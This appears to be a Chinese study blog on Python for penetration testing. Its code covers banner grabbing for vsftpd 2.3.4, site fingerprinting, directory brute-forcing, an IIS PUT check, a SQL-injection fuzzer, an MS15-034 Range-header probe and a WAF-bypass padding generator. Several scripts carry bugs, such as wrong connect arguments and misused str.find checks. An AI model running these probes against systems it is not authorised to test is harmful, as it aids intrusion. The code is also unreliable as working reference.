文章目录
基础语法部分
本文很水,只是随心记录,不喜勿喷,大佬绕过
socket
所谓套接字(Socket),就是对网络中不同主机上的应用进程之间进行双向通信的端点的抽象。一个套接字就是网络上进程通信的一端,提供了应用层进程利用网络协议交换数据的机制。从所处的地位来讲,套接字上联应用进程,下联网络协议栈,是应用程序通过网络协议进行通信的接口,是应用程序与网络协议根进行交互的接口
if语句
for循环
函数
异常处理
异常处理—传送门
线程
argparse基本用法
用于传递用户输入的参数
argparse基本用法----传送门
获取banner(服务名称和版本)信息
工具获取banner信息
python获取banner信息
代码改进1—添加if语句判断2.3.4是否在banner信息中
可见if目录
代码改进2–添加try
代码改进3–创建函数并调用
可见函数目录
import socket
#获取banner信息函数
def getBanner(ip,port):
#1.设置超时时间
socket.setdefaulttimeout(2)
#2.打开套接字调用socket模块
try:
s = socket.socket()
#3.建立连接
s.connect(ip.port)
#4.接受数据
banner = s.recv(1024)
#5.关闭连接
s.close()
return banner
except:
pass
#判断 banner信息里面是否含有2.3.4版本
def checkVulns(banner):
if("2.3.4" in banner):
print('vulnerable')
else:
print('unvulnerable')
if __name__ == '__main__':
ip1='192.168.1.1'
ip2='192.168.1.2'
port='21'
banner1=getBanner(ip1,port)
banner2 = checkVulns()
#如果banner1有值
#则将他打印ip并且丢到漏洞函数去检测
if banner1:
print(ip1)
checkVulns(banner1)
else:
print('no find')
if banner2:
print(ip2)
checkVulns(banner2)
else:
print('no find')
编写poc和exp
编写poc和exp----传送门
正则表达,网络编程,套接字
模块部分
模块的概念
模块导入
python脚本基础结构
sys模块
文件操作
传送门—文件操作
os模块
基础阶段脚本
百度url收集脚本
#coding:utf-8
#!/usr/bin/env python
# code by aedoo
# github: https://github.com/aedoo/
import requests,Queue,sys,threading,time
from bs4 import BeautifulSoup
import re
class BaiDuUrlSpider(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.__queue = queue
def run(self):
while not self.__queue.empty():
page_url = self.__queue.get(timeout=0.5)
try:
self.spider(page_url)
except Exception,e:
pass
def spider(self,page_url):
f1 = open('original_url.txt','a+')
f2 = open('home_url.txt','a+')
r = requests.get(url=page_url, headers=head)
soup = BeautifulSoup(r.content,'lxml')
raw_url = soup.find_all(name='a',attrs={'data-click':re.compile('.'),'class':None})
for raw in raw_url:
# print raw['href']
trick_url = raw['href']
response = requests.get(url=trick_url,headers=head,timeout=3)
if response.status_code==200:
print response.url
original_url = response.url
f1.write(original_url+'\n')
url_tmp = response.url
url_list = url_tmp.split('/')
print url_list[0]+'//'+url_list[2]
home_url = url_list[0]+'//'+url_list[2]
f2.write(home_url+'\n')
else:
print response.status_code
f1.close()
f2.close()
def main():
global head
head = {
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, sdch, br',
'Accept-Language': 'zh-CN,zh;q=0.8',
}
queue = Queue.Queue()
threads = []
threads_count = 200 #设置线程数目,最好不要大于爬取的页码数
if len(sys.argv)!=2:
print 'python Usage: %s keyword'% sys.argv[0]
sys.exit(-1)
else:
keyword = sys.argv[1]
for i in range(0,750,10): #百度默认最多75页,每页10个,根据规则定义的
url_start = 'https://www.baidu.com/s?wd=' + keyword + '&rn=10&pn=' #拼接百度搜索的URL
url = url_start+str(i)
queue.put(url)
for i in range(threads_count):
threads.append(BaiDuUrlSpider(queue))
for i in threads:
i.start()
for i in threads:
i.join()
if __name__ == '__main__':
f1 = open('original_url.txt','w')
f1.close()
f2 = open('home_url.txt','w')
f2.close()
time_start = time.time()
main()
print time.time()-time_start
四大件收集脚本
import requests
import os
import socket
import time
import optparse
from bs4 import BeautifulSoup
def main():
usage='-x 判断系统类型' \
'-t 判断数据库类型' \
'-g 判断服务架构' \
'-j 判断网站语言'
parser=optparse.OptionParser(usage)
parser.add_option('-x',dest='system',help='判断系统,判断原理通过目录来判断例:https://www.btime.com/finance')
parser.add_option('-t',dest='database',help='判断数据库,通过端口来判断数据库类型')
parser.add_option('-g',dest='headerss',help='判断架构')
parser.add_option('-j',dest='language',help='判断语言')
(options,args)=parser.parse_args()
if options.system:
system=options.system
SYSTEM(system)
elif options.database:
database=options.database
DATABASE(database)
elif options.language:
language=options.language
LANGUAGE(language)
elif options.headerss:
headerss=options.headerss
HEADERSS(headerss)
else:
parser.print_help()
exit()
def SYSTEM(system):
sc = "{}".format(system)
gs = sc[-1].capitalize()
sw = sc.strip(sc[-1])
url = sw + gs
sg = requests.get(url)
print(sg.url)
a = requests.get(sc).content
b = requests.get(url).content
if a != b:
print('系统是:Linux')
else:
print('系统是:windows')
def DATABASE(database):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.settimeout(3)
s.connect((database,1433))
print('[+]MSSQL数据库开放')
except:
print('[-]1433关闭')
time.sleep(0.1)
try:
s.settimeout(3)
s.connect((database,1521))
print('[+]oracle数据库开放')
except:
print('[-]1521端口关闭')
time.sleep(0.1)
try:
s.settimeout(3)
s.connect((database,3306))
print('[+]MYSQL数据库开放')
except:
print('[-]3306关闭')
def HEADERSS(headerss):
url="{}".format(headerss)
headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'}
r=requests.get(url,headers=headers)
print('[+]协议类型:',url[0],url[1],url[2],url[3],'/',r.status_code)
print('[+]服务架构:',r.headers['Server'])
print('[+]页面类型',r.headers['Content-Type'])
def LANGUAGE(language):
url="{}".format(language)
headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'}
g=requests.get(url,headers=headers)
try:
print('[+]程序支持',g.headers['X-Powered-By'])
except:
print('[-]没有找出该网站的程序支持')
if __name__ == '__main__':
main()
多线程获取banner信息
mport socket
import argparse
import threading
import sys
import os
parse = argparse.ArgumentParser(description="You can try : python banner.py -r ip.txt -p 21")
parse.add_argument('-r', '--dic', dest='diction', help='Please enter your dictionary', type=str)
parse.add_argument('-p', '--port', dest='port', help='Please enter your port', type=int)
args = parse.parse_args()
ip_dir = args.diction
port = args.port
#获取banner信息函数
def getBanner(ip,port):
#1.设置超时时间
socket.setdefaulttimeout(2)
#2.打开套接字调用socket模块
try:
s = socket.socket()
#3.建立连接
s.connect(ip.port)
#4.接受数据
banner = s.recv(1024)
#5.关闭连接
s.close()
return banner
except:
pass
#漏洞检查函数
def checkVulns(ip,port):
#将两个函数合并到一起,方便同时使用多线程
banner = getBanner(ip,port)
if banner:
if("2.3.4" in banner):
print('vulnerable')
else:
print('unvulnerable')
else:
print(ip +' '+ 'not get banner')
#主函数
def main():
# filename = str(sys.argv[1])
# if not os.path.exists(filename):
# print('文件不存在')
# sys.exit()
try:
with open(ip_dir,'r') as f: #第一步:获取用户输入的ip字典内容
for ip in f.readlines():
ip= ip.strip()
#导入多线程
t=threading.Thread(target=checkVulns,args=(ip,port))
#开始多线程
t.start()
except Exception as f:
print('你的错误是:%s'%f)
''
#for i in range(1,51):
#ip = print('192.168.1.'+str(i))
#banner=getBanner(all_ip,port) #第二步:调用套接字函数调用套接字函数,看能否连接上该端口
#如果banner1有值
#则将他打印ip并且丢到漏洞函数去检测
#if banner: #第三步:如果有值,打印出ip,并吧对象丢进漏洞检测函数去检查
#print(all_ip)
#checkVulns(banner)
#else:
#pass
''
if __name__ == '__main__':
main()
目录扫描工具
mport argparse
import requests
import sys
def main():
parse = argparse.ArgumentParser(description="You can try : python dirst.py -u http://www.baidu.com -d dir.txt")
parse.add_argument('-u', '--uesr', dest='name', help='Please enter your url', type=str)
parse.add_argument('-d', '--dic', dest='diction', help='Please enter your dictionary', type=str)
args = parse.parse_args()
url = args.name
diction = args.diction
# 准备url和遍历字典
# url = "http://192.168.1.103:90"
try:
with open(diction, "r") as f:
for line in f.readlines():
line = line.strip()
# print(url+line)
# 让url加遍历的字典,如果遍历的的url中返回200就代表找到了目录,并打印出
r = requests.get(url + line)
if r.status_code == 200:
print("find it:" + r.url)
except Exception as e:
print(str(e))
if __name__ == '__main__':
main()
PUT写入
import requests
url='http://192.168.1.103'
# 请求方式
r = requests.options(url)
#print(r.headers['Allow'])
result = r.headers['Public']
if result.find("PUT") and result.find("MOVE"):
print(result)
print('exist iis put vuln')
else:
print('no find')
获取服务器版本和脚本类型
import requests
a=input('请写入ip或域名:')
url = a
r = requests.get(url)
print('中间件:'+ r.headers['Server'])
print('服务器语言:'+ r.headers['X-Powered-By'])
sql爆错注入poc
import argparse
import requests
import sys
import math
parse = argparse.ArgumentParser(description="You can try : python dirst.py -u http://www.baidu.com -d dir.txt")
parse.add_argument('-u', '--uesr', dest='url', help='Please enter your url', type=str)
parse.add_argument('-d', '--dic', dest='diction', help='Please enter your dictionary', type=str)
args = parse.parse_args()
url = args.url
sql_fuzz_dic = args.diction
def get_urls():
urls = []
#1.打开字典
with open(sql_fuzz_dic,'r') as f:
payload_list = f.readlines()
#2.遍历字典并去除字符窜/n
for payload in payload_list:
#申请零时变量
temp_url = url
payload = payload.strip()
#3.替换url中fuzz为自己字典中的内容,并添加到temp_url变量中
urls.append(temp_url.replace("FUZZ",payload))
return urls
#遍历字典中的内容
inject_urls = get_urls()
#for i in inject_urls:
#print(i)
result_list = [] #储存验证sql注入成功的url
def text_sql():
for i in inject_urls: #1.循环测试url
r =requests.get(url=i) #2.用r来接受get请求
print('testing url:')
print(r.url) #输出测试的url
if r.text.find("SQL syntax"): #3.如果在请求中发现了sql syntax
result_list.append(r.url) #4.将其添加到列表中
if result_list == 0: #5.如果列表为空,则代表没有注入,有值则有注入
print('no sql')
else:
print('find it')
for i in result_list: #6.遍历列表中存在注入的内容
print(i)
ms15_04 poc
import requests
a= input('请输入MS_15_034 IP或域名:')
url=a
header={
'Host': 'stuff',
'Range': 'bytes=0-18446744073709551615'
}
r = requests.get(url,headers=header)
server = r.headers['Server']
if server.find('IIS/7.5') or server.find('IIS/8.0'):
if r.text.find('Requested Range Not Satisfiable'):
print('find ms15_035')
else:
pass
else:
print('no find')
万能绕waf脚本(只能部分)
#coding=utf-8
import random,string
from urllib import parse
# code by yzddMr6
varname_min = 5
varname_max = 15
data_min = 20
data_max = 25
num_min = 50
num_max = 100
def randstr(length):
str_list = [random.choice(string.ascii_letters) for i in range(length)]
random_str = ''.join(str_list)
return random_str
def main():
data={}
for i in range(num_min,num_max):
data[randstr(random.randint(varname_min,varname_max))]=randstr(random.randint(data_min,data_max))
print('&'+parse.urlencode(data)+'&')
main()